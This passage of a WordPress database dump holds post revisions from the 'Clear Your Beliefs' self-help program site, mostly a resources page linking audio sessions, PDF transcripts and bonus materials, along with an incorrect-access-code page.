href="/wp-content/uploads/resources/Clear%20Your Beliefs-01.mp3">Clear Your Beliefs-01.mp3</a>\r\n\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-02.mp3"><span style="color: #000000;">Session 2:  Clear Your Negative Beliefs About Who You Are</span>\r\nClear Your Beliefs-02.mp3</a>\r\n\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-03.mp3"><span style="color: #000000;">Session 3: Clear Your Limiting Beliefs About Your Capabilities</span>\r\nClear Your Beliefs-03.mp3</a>\r\n\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-04.mp3"><span style="color: #000000;">Session 4: Clear Your Outdated Beliefs About Love &amp; Relationship</span>\r\nClear Your Beliefs-04.mp3</a>\r\n\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-05.mp3"><span style="color: #000000;">Session 5: Clear Your Old Beliefs About Money and Work</span>\r\nClear Your Beliefs-05.mp3</a>\r\n\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-06.mp3"><span style="color: #000000;">Session 6: Clear Uncomfortable Beliefs About Your Body &amp; Health</span>\r\nClear Your Beliefs-06.mp3</a>\r\n\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-07.mp3"><span style="color: #000000;">Session 7: Clear Out the Rest of the Junk in Your BeliefCloset</span>\r\nClear Your Beliefs-07.mp3</a>\r\n\r\nBonus Call 1: Anodea Judith on Manifestating with Beliefs\r\n<a href="/wp-content/uploads/resources/Clear Your Beliefs-Bonus Call With Anodea Judith.mp3">Clear Your Beliefs-Bonus Call With Anodea Judith.mp3</a>\r\n\r\nBonus Call 2: Carista Luminare on Love and Relationships<a href="/wp-content/uploads/resources/Clear Your Beliefs-BonusCallWithCaristaLuminare.mp3">\r\nClear Your Beliefs-Bonus Call With Carista Luminare.mp3</a>\r\n<p style="text-align: center;">. . .</p>\r\n\r\n<h5><strong>Transcripts:\r\n</strong>\r\nSession 1: Pull All the Old Junk Out of Your BeliefCloset\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-1.pdf">CYB-1\r\n</a>\r\nSession 2:  Clear Your Negative Beliefs About Who You Are\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-2.pdf">CYB-2</a></h5>\r\nSession 3: Clear Your Limiting Beliefs About Your Capabilities\r\nPDF Download  <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-3.pdf">CYB-3</a>\r\n\r\nSession 4: Clear Your Outdated Beliefs About Love &amp; Relationship\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-4.pdf">CYB-4</a>\r\n\r\nSession 5: Clear Your Old Beliefs About Money and Work\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-5.pdf">CYB-5</a>\r\n\r\nSession 6: Clear Uncomfortable Beliefs About Your Body &amp; Health\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-6.pdf">CYB-6</a>\r\n\r\nSession 7: Clear Out the Rest of the Junk in Your BeliefCloset\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-7.pdf">CYB-7</a>\r\n\r\nBonus Call: Carista Luminare, Ph.D.:  What Makes Love So Confusing?\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-Bonus-1-CL.pdf">CYB Bonus 1 CL</a>\r\n\r\nBonus Call: Anodea Judith, Ph.D: The Spiritual Technology of Manifesting\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-Bonus-2-AJ.pdf">CYB Bonus 2 AJ</a>\r\n<p style="text-align: center;"> . . .</p>\r\n\r\n<h5>Bonus Materials:</h5>\r\n<strong>The Belief Self-Diagnosis Exercise:   (</strong>First read and do Part 1.  Then read and do Part 2.)\r\n\r\n<strong><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-Belief-Self-Diagnosis-Exercise-2014.pdf">CYB Belief Self-Diagnosis Exercise 2014</a>      (Part 1)</strong>\r\n\r\n<strong> <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-Belief-Self-Diagnosis-Exercise-2014.21.pdf">CYB Belief Self-Diagnosis Exercise 2014.2</a> (Part 2)</strong>\r\n<p style="text-align: center;">. . .</p>\r\n<strong>Take the LoveStyle Profile Quiz by clicking <a href="http://www.confusedaboutlove.com/the-lovestyles-profile/">HERE</a>.  Or paste this url into your browser:</strong>  www.ConfusedAboutLove.com/the-lovestyles-profile/\r\n<p style="text-align: center;">. . .</p>\r\n<strong>Download the multimedia eBook, "Transform Your Beliefs" by Lion Goodman, by clicking <a href="https://www.yousendit.com/download/TEhWM25NNnlVbStGa2NUQw">HERE</a>. </strong>  Or paste this url into your browser:  https://www.yousendit.com/download/TEhWM25NNnlVbStGa2NUQw\r\n\r\n[Note: You''ll be taken to a Hightail Download page.  Simply click on the "Download" button and your copy of the eBook will be downloaded into your computer.  It''s a big file, so be patient. You need Adobe Reader Version 9 or above to access all the materials. (Get the latest Adobe Reader <a href="http://get.adobe.com/reader/">HERE</a>.)\r\n\r\nOnce you''ve downloaded it, you''ll see embedded video and audio files that will play when you click on them. If they don''t play, click the link below each media, which will take you to the same file on the web (be sure you''re connected to the Internet).]\r\n\r\n&nbsp;\r\n\r\n&nbsp;', 'Resources', '', 'inherit', 'closed', 'open', '', '139-revision-v1', '', '', '2014-06-28 18:38:30', '2014-06-28 23:38:30', '', 139, 'http://clearyourbeliefs.com/139-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(1155, 2, '2014-06-28 18:42:18', '2014-06-28 23:42:18', '<h1 style="text-align: center;">Thank You for Registering for\r\n<em>Clear Your Beliefs\r\n</em></h1>\r\n&nbsp;\r\n\r\nThis page contains all of the resources you need to take yourself through this breakthrough program.\r\n\r\nIf you are working with a <em>Clear Your Beliefs Coach</em>, he or she will instruct you on which audio to listen to, and how to follow up with them.\r\n\r\nDownload the "<strong>Course Guidebook</strong>" for suggestions on how to take yourself through the program, step-by-step.\r\n\r\nWelcome to Clear Your Beliefs!\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-signature.jpg"><img class="alignleft size-medium wp-image-256 no-shad" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-signature-300x70.jpg" alt="lion-signature" width="300" height="70" /></a>\r\n\r\n&nbsp;\r\n<h6>Lion Goodman\r\nFounder</h6>\r\n<h1>Audio Recordings</h1>\r\n<span style="color: #800000;">[<strong>NOTE</strong>: To save any file to your computer, Right-click the link and "Save As," pointing to the folder where you want the file saved for later listening (the default is usually your Downloads folder). Or, click each link and listen (or read) any file on your browser now.]</span>\r\n\r\n<strong>Session 1: Pull All the Old Junk Out of Your BeliefCloset</strong>\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-01.mp3">Clear Your Beliefs-01.mp3</a>\r\n\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-02.mp3"><strong><span style="color: #000000;">Session 2:  Clear Your Negative Beliefs About Who You Are</span></strong>\r\nClear Your Beliefs-02.mp3</a>\r\n\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-03.mp3"><strong><span style="color: #000000;">Session 3: Clear Your Limiting Beliefs About Your Capabilities</span></strong>\r\nClear Your Beliefs-03.mp3</a>\r\n\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-04.mp3"><strong><span style="color: #000000;">Session 4: Clear Your Outdated Beliefs About Love &amp; Relationship</span></strong>\r\nClear Your Beliefs-04.mp3</a>\r\n\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-05.mp3"><strong><span style="color: #000000;">Session 5: Clear Your Old Beliefs About Money and Work</span></strong>\r\nClear Your Beliefs-05.mp3</a>\r\n\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-06.mp3"><strong><span style="color: #000000;">Session 6: Clear Uncomfortable Beliefs About Your Body &amp; Health</span></strong>\r\nClear Your Beliefs-06.mp3</a>\r\n\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-07.mp3"><strong><span style="color: #000000;">Session 7: Clear Out the Rest of the Junk in Your BeliefCloset</span></strong>\r\nClear Your Beliefs-07.mp3</a>\r\n\r\n<strong>Bonus Call 1: Anodea Judith on Manifestating with Beliefs</strong>\r\n<a href="/wp-content/uploads/resources/Clear Your Beliefs-Bonus Call With Anodea Judith.mp3">Clear Your Beliefs-Bonus Call With Anodea Judith.mp3</a>\r\n\r\n<strong>Bonus Call 2: Carista Luminare on Love and Relationships</strong><a href="/wp-content/uploads/resources/Clear Your Beliefs-BonusCallWithCaristaLuminare.mp3">\r\nClear Your Beliefs-Bonus Call With Carista Luminare.mp3</a>\r\n<p style="text-align: center;">. . .</p>\r\n<strong>Transcripts:\r\n</strong>\r\n<strong>Session 1: Pull All the Old Junk Out of Your BeliefCloset</strong>\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-1.pdf">CYB-1\r\n</a>\r\n<strong>Session 2:  Clear Your Negative Beliefs About Who You Are</strong>\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-2.pdf">CYB-2</a>\r\n\r\n<strong>Session 3: Clear Your Limiting Beliefs About Your Capabilities</strong>\r\nPDF Download  <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-3.pdf">CYB-3</a>\r\n\r\n<strong>Session 4: Clear Your Outdated Beliefs About Love &amp; Relationship</strong>\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-4.pdf">CYB-4</a>\r\n\r\n<strong>Session 5: Clear Your Old Beliefs About Money and Work</strong>\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-5.pdf">CYB-5</a>\r\n\r\n<strong>Session 6: Clear Uncomfortable Beliefs About Your Body &amp; Health</strong>\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-6.pdf">CYB-6</a>\r\n\r\n<strong>Session 7: Clear Out the Rest of the Junk in Your BeliefCloset</strong>\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-7.pdf">CYB-7</a>\r\n\r\n<strong>Bonus Call: Carista Luminare, Ph.D.:  What Makes Love So Confusing?</strong>\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-Bonus-1-CL.pdf">CYB Bonus 1 CL</a>\r\n\r\n<strong>Bonus Call: Anodea Judith, Ph.D: The Spiritual Technology of Manifesting</strong>\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-Bonus-2-AJ.pdf">CYB Bonus 2 AJ</a>\r\n<p style="text-align: center;"> . . .</p>\r\n\r\n<h5>Bonus Materials:</h5>\r\n<strong>The Belief Self-Diagnosis Exercise:   (</strong>First read and do Part 1.  Then read and do Part 2.)\r\n\r\n<strong><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-Belief-Self-Diagnosis-Exercise-2014.pdf">CYB Belief Self-Diagnosis Exercise 2014</a>      (Part 1)</strong>\r\n\r\n<strong> <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-Belief-Self-Diagnosis-Exercise-2014.21.pdf">CYB Belief Self-Diagnosis Exercise 2014.2</a> (Part 2)</strong>\r\n<p style="text-align: center;">. . .</p>\r\n<strong>Take the LoveStyle Profile Quiz by clicking <a href="http://www.confusedaboutlove.com/the-lovestyles-profile/">HERE</a>.  Or paste this url into your browser:</strong>  www.ConfusedAboutLove.com/the-lovestyles-profile/\r\n<p style="text-align: center;">. . .</p>\r\n<strong>Download the multimedia eBook, "Transform Your Beliefs" by Lion Goodman, by clicking <a href="https://www.yousendit.com/download/TEhWM25NNnlVbStGa2NUQw">HERE</a>. </strong>  Or paste this url into your browser:  https://www.yousendit.com/download/TEhWM25NNnlVbStGa2NUQw\r\n\r\n[Note: You''ll be taken to a Hightail Download page.  Simply click on the "Download" button and your copy of the eBook will be downloaded into your computer.  It''s a big file, so be patient. You need Adobe Reader Version 9 or above to access all the materials. (Get the latest Adobe Reader <a href="http://get.adobe.com/reader/">HERE</a>.)  Once you''ve downloaded it, you''ll see embedded video and audio files that will play when you click on them. If they don''t play, click the link below each media, which will take you to the same file on the web (be sure you''re connected to the Internet).]\r\n\r\n&nbsp;\r\n\r\n&nbsp;', 'Resources', '', 'inherit', 'closed', 'open', '', '139-revision-v1', '', '', '2014-06-28 18:42:18', '2014-06-28 23:42:18', '', 139, 'http://clearyourbeliefs.com/139-revision-v1', 0, 'revision', '', 0),
(1156, 2, '2014-06-28 19:26:46', '2014-06-29 00:26:46', '', 'Creating_On_Purpose_SampleChapters', '', 'inherit', 'closed', 'open', '', 'creating_on_purpose_samplechapters', '', '', '2014-06-28 19:26:46', '2014-06-29 00:26:46', '', 139, 'http://clearyourbeliefs.com/wp-content/uploads/2014/03/Creating_On_Purpose_SampleChapters.pdf', 0, 'attachment', 'application/pdf', 0),
(1157, 2, '2014-06-28 19:27:45', '2014-06-29 00:27:45', '<h1 style="text-align: center;">Thank You for Registering for\r\n<em>Clear Your Beliefs\r\n</em></h1>\r\n&nbsp;\r\n\r\nThis page contains all of the resources you need to take yourself through this breakthrough program.\r\n\r\nIf you are working with a <em>Clear Your Beliefs Coach</em>, he or she will instruct you on which audio to listen to, and how to follow up with them.\r\n\r\nDownload the "<strong>Course Guidebook</strong>" for suggestions on how to take yourself through the program, step-by-step.\r\n\r\nWelcome to Clear Your Beliefs!\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-signature.jpg"><img class="alignleft size-medium wp-image-256 no-shad" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-signature-300x70.jpg" alt="lion-signature" width="300" height="70" /></a>\r\n\r\n&nbsp;\r\n<h6>Lion Goodman\r\nFounder</h6>\r\n<h1>Audio Recordings</h1>\r\n<span style="color: #800000;">[<strong>NOTE</strong>: To save any file to your computer, Right-click the link and "Save As," pointing to the folder where you want the file saved for later listening (the default is usually your Downloads folder). Or, click each link and listen (or read) any file on your browser now.]</span>\r\n\r\n<strong>Session 1: Pull All the Old Junk Out of Your BeliefCloset</strong>\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-01.mp3">Clear Your Beliefs-01.mp3</a>\r\n\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-02.mp3"><strong><span style="color: #000000;">Session 2:  Clear Your Negative Beliefs About Who You Are</span></strong>\r\nClear Your Beliefs-02.mp3</a>\r\n\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-03.mp3"><strong><span style="color: #000000;">Session 3: Clear Your Limiting Beliefs About Your Capabilities</span></strong>\r\nClear Your Beliefs-03.mp3</a>\r\n\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-04.mp3"><strong><span style="color: #000000;">Session 4: Clear Your Outdated Beliefs About Love &amp; Relationship</span></strong>\r\nClear Your Beliefs-04.mp3</a>\r\n\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-05.mp3"><strong><span style="color: #000000;">Session 5: Clear Your Old Beliefs About Money and Work</span></strong>\r\nClear Your Beliefs-05.mp3</a>\r\n\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-06.mp3"><strong><span style="color: #000000;">Session 6: Clear Uncomfortable Beliefs About Your Body &amp; Health</span></strong>\r\nClear Your Beliefs-06.mp3</a>\r\n\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-07.mp3"><strong><span style="color: #000000;">Session 7: Clear Out the Rest of the Junk in Your BeliefCloset</span></strong>\r\nClear Your Beliefs-07.mp3</a>\r\n\r\n<strong>Bonus Call 1: Anodea Judith on Manifestating with Beliefs</strong>\r\n<a href="/wp-content/uploads/resources/Clear Your Beliefs-Bonus Call With Anodea Judith.mp3">Clear Your Beliefs-Bonus Call With Anodea Judith.mp3</a>\r\n\r\n<strong>Bonus Call 2: Carista Luminare on Love and Relationships</strong><a href="/wp-content/uploads/resources/Clear Your Beliefs-BonusCallWithCaristaLuminare.mp3">\r\nClear Your Beliefs-Bonus Call With Carista Luminare.mp3</a>\r\n<p style="text-align: center;">. . .</p>\r\n<strong>Transcripts:\r\n</strong>\r\n<strong>Session 1: Pull All the Old Junk Out of Your BeliefCloset</strong>\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-1.pdf">CYB-1\r\n</a>\r\n<strong>Session 2:  Clear Your Negative Beliefs About Who You Are</strong>\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-2.pdf">CYB-2</a>\r\n\r\n<strong>Session 3: Clear Your Limiting Beliefs About Your Capabilities</strong>\r\nPDF Download  <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-3.pdf">CYB-3</a>\r\n\r\n<strong>Session 4: Clear Your Outdated Beliefs About Love &amp; Relationship</strong>\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-4.pdf">CYB-4</a>\r\n\r\n<strong>Session 5: Clear Your Old Beliefs About Money and Work</strong>\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-5.pdf">CYB-5</a>\r\n\r\n<strong>Session 6: Clear Uncomfortable Beliefs About Your Body &amp; Health</strong>\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-6.pdf">CYB-6</a>\r\n\r\n<strong>Session 7: Clear Out the Rest of the Junk in Your BeliefCloset</strong>\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-7.pdf">CYB-7</a>\r\n\r\n<strong>Bonus Call: Carista Luminare, Ph.D.:  What Makes Love So Confusing?</strong>\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-Bonus-1-CL.pdf">CYB Bonus 1 CL</a>\r\n\r\n<strong>Bonus Call: Anodea Judith, Ph.D: The Spiritual Technology of Manifesting</strong>\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-Bonus-2-AJ.pdf">CYB Bonus 2 AJ</a>\r\n<p style="text-align: center;"> . . .</p>\r\n\r\n<h5>Bonus Materials:</h5>\r\n<strong>The Belief Self-Diagnosis Exercise:   (</strong>First read and do Part 1.  Then read and do Part 2.)\r\n\r\n<strong><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-Belief-Self-Diagnosis-Exercise-2014.pdf">CYB Belief Self-Diagnosis Exercise 2014</a>      (Part 1)</strong>\r\n\r\n<strong> <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-Belief-Self-Diagnosis-Exercise-2014.21.pdf">CYB Belief Self-Diagnosis Exercise 2014.2</a> (Part 2)</strong>\r\n<p style="text-align: center;">. . .</p>\r\n<strong>Take the LoveStyle Profile Quiz by clicking <a href="http://www.confusedaboutlove.com/the-lovestyles-profile/">HERE</a>.  Or paste this url into your browser:</strong>  www.ConfusedAboutLove.com/the-lovestyles-profile/\r\n<p style="text-align: center;">. . .</p>\r\n<strong>Download the multimedia eBook, "Transform Your Beliefs" by Lion Goodman, by clicking <a href="https://www.yousendit.com/download/TEhWM25NNnlVbStGa2NUQw">HERE</a>. </strong>  Or paste this url into your browser:  https://www.yousendit.com/download/TEhWM25NNnlVbStGa2NUQw\r\n\r\n[Note: You''ll be taken to a Hightail Download page.  Simply click on the "Download" button and your copy of the eBook will be downloaded into your computer.  It''s a big file, so be patient. You need Adobe Reader Version 9 or above to access all the materials. (Get the latest Adobe Reader <a href="http://get.adobe.com/reader/">HERE</a>.)  Once you''ve downloaded it, you''ll see embedded video and audio files that will play when you click on them. If they don''t play, click the link below each media, which will take you to the same file on the web (be sure you''re connected to the Internet).]\r\n<p style="text-align: center;">. . .</p>\r\n<p style="text-align: left;"><strong>Download and read the first two chapters</strong> of <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras</em> by Anodea Judith and Lion Goodman.    PDF: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/Creating_On_Purpose_SampleChapters.pdf">Creating_On_Purpose_SampleChapters</a></p>\r\n&nbsp;', 'Resources', '', 'inherit', 'closed', 'open', '', '139-revision-v1', '', '', '2014-06-28 19:27:45', '2014-06-29 00:27:45', '', 139, 'http://clearyourbeliefs.com/139-revision-v1', 0, 'revision', '', 0),
(1158, 4194, '2014-06-28 21:09:37', '2014-06-29 02:09:37', '<h1 style="text-align: center;">Sorry, your access code is incorrect.</h1>\r\n<h6 style="text-align: center;">To access the resources you purchased, either find the email you received when you purchased the Clear Your Belief Audio Program and  link to the page from there or click Submit on the form below to have the access code re-sent to you.</h6>\r\n<h6 style="text-align: center;">If you haven''t purchased this program yet,click <a href="http://clearyourbeliefs.com">here</a> to see what your missing!</h6>\r\n<h3>Thank you!</h3>\r\n&nbsp;', 'Incorrect Access Code', '', 'inherit', 'closed', 'open', '', '1128-revision-v1', '', '', '2014-06-28 21:09:37', '2014-06-29 02:09:37', '', 1128, 'http://clearyourbeliefs.com/1128-revision-v1', 0, 'revision', '', 0),
(1159, 4194, '2014-06-28 21:11:06', '2014-06-29 02:11:06', '<h1 style="text-align: center;">Sorry, your access code is incorrect.</h1>\r\n<h6 style="text-align: center;">To access the resources you purchased, either find the email you received when you purchased the Clear Your Belief Audio Program and link to the page from there or click Submit on the form below to have the access code re-sent to you.</h6>\r\n<h6 style="text-align: center;">If you haven''t purchased this program yet, click <a href="http://clearyourbeliefs.com">here</a> to see what you''re missing!</h6>\r\n<h3>Thank you!</h3>\r\n&nbsp;', 'Incorrect Access Code', '', 'inherit', 'closed', 'open', '', '1128-revision-v1', '', '', '2014-06-28 21:11:06', '2014-06-29 02:11:06', '', 1128, 'http://clearyourbeliefs.com/1128-revision-v1', 0, 'revision', '', 0),
(1160, 4194, '2014-06-28 21:12:41', '2014-06-29 02:12:41', '<h1 style="text-align: center;">Sorry, your access code is incorrect.</h1>\r\n<h6 style="text-align: center;">To access the resources you purchased, either find the email you received when you purchased the Clear Your Belief Audio Program and link to the page from there or click Submit on the form below to have the access code re-sent to you.</h6>\r\n<h6 style="text-align: center;">If you haven''t purchased this program yet, click <a href="http://clearyourbeliefs.com">here</a> to see what you''re missing!</h6>\r\n<h3 style="text-align: center;">Thank you!</h3>\r\n&nbsp;', 'Incorrect Access Code', '', 'inherit', 'closed', 'open', '', '1128-revision-v1', '', '', '2014-06-28 21:12:41', '2014-06-29 02:12:41', '', 1128, 'http://clearyourbeliefs.com/1128-revision-v1', 0, 'revision', '', 0),
(1161, 4194, '2014-06-28 21:37:35', '2014-06-29 02:37:35', '<h1 style="text-align: center;">Thank You for Registering for\r\n<em>Clear Your Beliefs\r\n</em></h1>\r\n&nbsp;\r\n\r\nThis page contains all of the resources you need to take yourself through this breakthrough program.\r\n\r\nIf you are working with a <em>Clear Your Beliefs Coach</em>, he or she will instruct you on which audio to listen to, and how to follow up with them.\r\n\r\nDownload the "<strong>Course Guidebook</strong>" for suggestions on how to take yourself through the program, step-by-step.\r\n\r\nWelcome to Clear Your Beliefs!\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-signature.jpg"><img class="alignleft size-medium wp-image-256 no-shad" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-signature-300x70.jpg" alt="lion-signature" width="300" height="70" /></a>\r\n\r\n&nbsp;\r\n<h6>Lion Goodman\r\nFounder</h6>\r\n<h1>Audio Recordings</h1>\r\n<span style="color: #800000;">[<strong>NOTE</strong>: To save any file to your computer, Right-click the link and "Save As," pointing to the folder where you want the file saved for later listening (the default is usually your Downloads folder). Or, click each link and listen (or read) any file on your browser now.]</span>\r\n\r\n<strong>Session 1: Pull All the Old Junk Out of Your BeliefCloset</strong>\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-01.mp3">Clear Your Beliefs-01.mp3</a>\r\n\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-02.mp3"><strong><span style="color: #000000;">Session 2:  Clear Your Negative Beliefs About Who You Are</span></strong>\r\nClear Your Beliefs-02.mp3</a>\r\n\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-03.mp3"><strong><span style="color: #000000;">Session 3: Clear Your Limiting Beliefs About Your Capabilities</span></strong>\r\nClear Your Beliefs-03.mp3</a>\r\n\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-04.mp3"><strong><span style="color: #000000;">Session 4: Clear Your Outdated Beliefs About Love &amp; Relationship</span></strong>\r\nClear Your Beliefs-04.mp3</a>\r\n\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-05.mp3"><strong><span style="color: #000000;">Session 5: Clear Your Old Beliefs About Money and Work</span></strong>\r\nClear Your Beliefs-05.mp3</a>\r\n\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-06.mp3"><strong><span style="color: #000000;">Session 6: Clear Uncomfortable Beliefs About Your Body &amp; Health</span></strong>\r\nClear Your Beliefs-06.mp3</a>\r\n\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-07.mp3"><strong><span style="color: #000000;">Session 7: Clear Out the Rest of the Junk in Your BeliefCloset</span></strong>\r\nClear Your Beliefs-07.mp3</a>\r\n\r\n<strong>Bonus Call 1: Anodea Judith on Manifestating with Beliefs</strong>\r\n<a href="/wp-content/uploads/resources/Clear Your Beliefs-Bonus Call With Anodea Judith.mp3">Clear Your Beliefs-Bonus Call With Anodea Judith.mp3</a>\r\n\r\n<strong>Bonus Call 2: Carista Luminare on Love and Relationships</strong><a href="/wp-content/uploads/resources/Clear Your Beliefs-BonusCallWithCaristaLuminare.mp3">\r\nClear Your Beliefs-Bonus Call With Carista Luminare.mp3</a>\r\n<p style="text-align: center;">. . .</p>\r\n\r\n<h1><strong>Transcripts:</strong></h1>\r\n<strong>Session 1: Pull All the Old Junk Out of Your BeliefCloset</strong>\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-1.pdf">CYB-1\r\n</a>\r\n<strong>Session 2:  Clear Your Negative Beliefs About Who You Are</strong>\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-2.pdf">CYB-2</a>\r\n\r\n<strong>Session 3: Clear Your Limiting Beliefs About Your Capabilities</strong>\r\nPDF Download  <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-3.pdf">CYB-3</a>\r\n\r\n<strong>Session 4: Clear Your Outdated Beliefs About Love &amp; Relationship</strong>\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-4.pdf">CYB-4</a>\r\n\r\n<strong>Session 5: Clear Your Old Beliefs About Money and Work</strong>\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-5.pdf">CYB-5</a>\r\n\r\n<strong>Session 6: Clear Uncomfortable Beliefs About Your Body &amp; Health</strong>\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-6.pdf">CYB-6</a>\r\n\r\n<strong>Session 7: Clear Out the Rest of the Junk in Your BeliefCloset</strong>\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-7.pdf">CYB-7</a>\r\n\r\n<strong>Bonus Call: Carista Luminare, Ph.D.:  What Makes Love So Confusing?</strong>\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-Bonus-1-CL.pdf">CYB Bonus 1 CL</a>\r\n\r\n<strong>Bonus Call: Anodea Judith, Ph.D: The Spiritual Technology of Manifesting</strong>\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-Bonus-2-AJ.pdf">CYB Bonus 2 AJ</a>\r\n<p style="text-align: center;"> . . .</p>\r\n\r\n<h5>Bonus Materials:</h5>\r\n<strong>The Belief Self-Diagnosis Exercise:   (</strong>First read and do Part 1.  Then read and do Part 2.)\r\n\r\n<strong><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-Belief-Self-Diagnosis-Exercise-2014.pdf">CYB Belief Self-Diagnosis Exercise 2014</a>      (Part 1)</strong>\r\n\r\n<strong> <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-Belief-Self-Diagnosis-Exercise-2014.21.pdf">CYB Belief Self-Diagnosis Exercise 2014.2</a> (Part 2)</strong>\r\n<p style="text-align: center;">. . .</p>\r\n<strong>Take the LoveStyle Profile Quiz by clicking <a href="http://www.confusedaboutlove.com/the-lovestyles-profile/">HERE</a>.  Or paste this url into your browser:</strong>  www.ConfusedAboutLove.com/the-lovestyles-profile/\r\n<p style="text-align: center;">. . .</p>\r\n<strong>Download the multimedia eBook, "Transform Your Beliefs" by Lion Goodman, by clicking <a href="https://www.yousendit.com/download/TEhWM25NNnlVbStGa2NUQw">HERE</a>. </strong>  Or paste this url into your browser:  https://www.yousendit.com/download/TEhWM25NNnlVbStGa2NUQw\r\n\r\n[Note: You''ll be taken to a Hightail Download page.  Simply click on the "Download" button and your copy of the eBook will be downloaded into your computer.  It''s a big file, so be patient. You need Adobe Reader Version 9 or 